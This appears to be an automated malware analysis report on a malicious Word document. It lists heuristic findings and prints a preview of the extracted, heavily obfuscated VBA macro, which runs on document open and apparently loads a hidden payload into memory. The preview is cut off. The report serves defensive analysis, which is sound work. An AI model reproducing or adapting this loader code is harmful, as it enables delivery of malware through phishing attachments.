Verdict: MALICIOUS
Risk score: 102
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is an OLE document with a high-risk heuristic firing for VBA macros, specifically a Document_Open macro. The presence of obfuscated VBA code suggests an attempt to download and execute a secondary payload, a common technique for initial compromise. The document body contains what appears to be malformed image data, which is unusual and may be an attempt to hide malicious content.
Heuristics (4)

- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 185,858 bytes but its declared streams total only 97,963 bytes — 87,895 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

  URLs:
  - http://ns.adobe.com/xap/1.0/ : In document text (OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# : In document text (OLE body)
  - http://ns.adobe.com/photoshop/1.0/ : In document text (OLE body)
  - http://purl.org/dc/elements/1.1/ : In document text (OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ : In document text (OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# : In document text (OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# : In document text (OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main : In document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13786 bytes | 2e70c2ae35845d8bf643cba16bd2f26e8d85a19769b1d99e4b36b8547dbc4ad0 |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function necropolis(allomerous)
Dim octopodidae As Long
Dim conspection As Byte
Dim chimes As Byte
Dim phlebotomy As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim impatiently As Integer
Dim anglomania As LongPtr
capitalist = 74 + 8 - 74
Dim osteolysis As LongPtr
Dim drawler As Byte
Dim vitiligo As String
Dim defending As LongPtr
Dim afterdinner As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim anglomania As Long
capitalist = 85 - 73 - 8
Dim osteolysis As Long
Dim defending As Long
#End If
cooled = VarPtr(anglomania)
blastoderm = chargeship(cooled, VarPtr(allomerous) + 8, capitalist)
hyades = 1 - 2
osteolysis = 7 - 19 + 12
chagatai = 2 - 2
defending = 9980 + 2
lenticular = 4090 + 6
abounding = 107 - 104 + 61
seclusion = commiphora(ByVal hyades, osteolysis, ByVal chagatai, defending, ByVal lenticular, ByVal abounding)
chironomus = "dosages"
coalbin = Rnd(474)
chargeship osteolysis, anglomania, 94 + 42 + 5747
plutocrat = 100 + 2
expressly = 15770 + 4
nicher = 537470 + 0
Pmt 0, plutocrat, 14522, 56157, 8
necropolis = osteolysis
End Function
Function chargeship(psychopharmacological, inconclusive, caroler)
vagons = samara(20 / 4)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (vagons) Then
Dim melanthiaceae As Variant
Dim theorize As Integer
Dim illconducted As LongPtr
Dim unamazed As LongPtr
Dim volatile As LongPtr
Dim cellarage As String
Dim semper As LongPtr
Dim decrepitude As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (vagons) Then
Dim unamazed As Long
Dim ancestress As Byte
Dim illconducted As Long
Dim embassy As String
Dim semper As Long
Dim dauntless As Long
Dim volatile As Long
Dim publisher As Integer
Dim decrepitude As Long
Dim acquirable As Integer
Dim alcelaphus As Variant
#End If
coalbin = ghazal \ 325
calorific = ghazal + 298
unamazed = psychopharmacological
decrepitude = caroler
calorific = calorific And 391
semper = inconclusive
calculatingly = 40 + 3
arresting = 27220 + 9
bisect = 456720 + 0
Pmt 0, calculatingly, 37100, 49894, 4
ghazal = Math.Round(180)
illconducted = 27 + 64 - 92
heartthrob ByVal illconducted, unamazed, semper, decrepitude, volatile
coalbin = coalbin + 90
End Function
Private Sub Document_Open()
Dim beagling As Long
Dim bangup As Byte
impertinently = crackajack
plunged = "cabriolet"
draco
slinging = 80 + 4
siriasis = 38570 + 4
aeciospore = 434070 + 6
Pmt 0, slinging, 21184, 21432, 5
End Sub
Sub draco()
Dim infelicitous As Long
Dim cheloniidae As Byte
skye.apc.Value = Day(#12/5/2013#)
varday = discomycetes = "alamo"
menteur = "boulebards"
dakota = sanative
compte = "exit"
prester = "bacteria"
dressed = "blazing"
negatively = nononsense
Set sunbeam = skye.apc.SelectedItem
manorhouse = 60 + 6
dorm = 16730 + 9
flippant = 380250 + 8
Pmt 0, manorhouse, 38767, 34240, 6
acidic = sunbeam.Name
whip = 7840 + 4
sickbed = Right(acidic, whip)
analbuminemia = impersonation.lepore(sickbed)
afghan = 20 + 2
puritanical = 31750 + 4
intrastate = 541970 + 1
Pmt 0, afghan, 30750, 34145, 3
clothesless = humility
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim cortege As String
Dim hardearned As LongPtr
Dim syllable As LongPtr
Dim palanquin As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim dissentiente As Integer
Dim syllable As Long
Dim bosom As Long
Dim hardearned As Long
#End If
meniscus = 77 - 8 - 69
inhibition = artsycraftsy
anguillan = "aftercourse"
client = 28 - 40 + 4108
nathless = 90 + 2
campaign = 29600 + 6
heartrobbing = 406070 + 6
Pmt 0, nathless, 7367, 54281, 5
athletic = "schooner"
merely = ... (truncated)
```